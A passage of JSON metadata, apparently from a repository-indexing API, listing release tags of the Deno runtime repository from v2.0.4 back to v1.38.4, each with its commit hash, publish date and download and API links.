/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":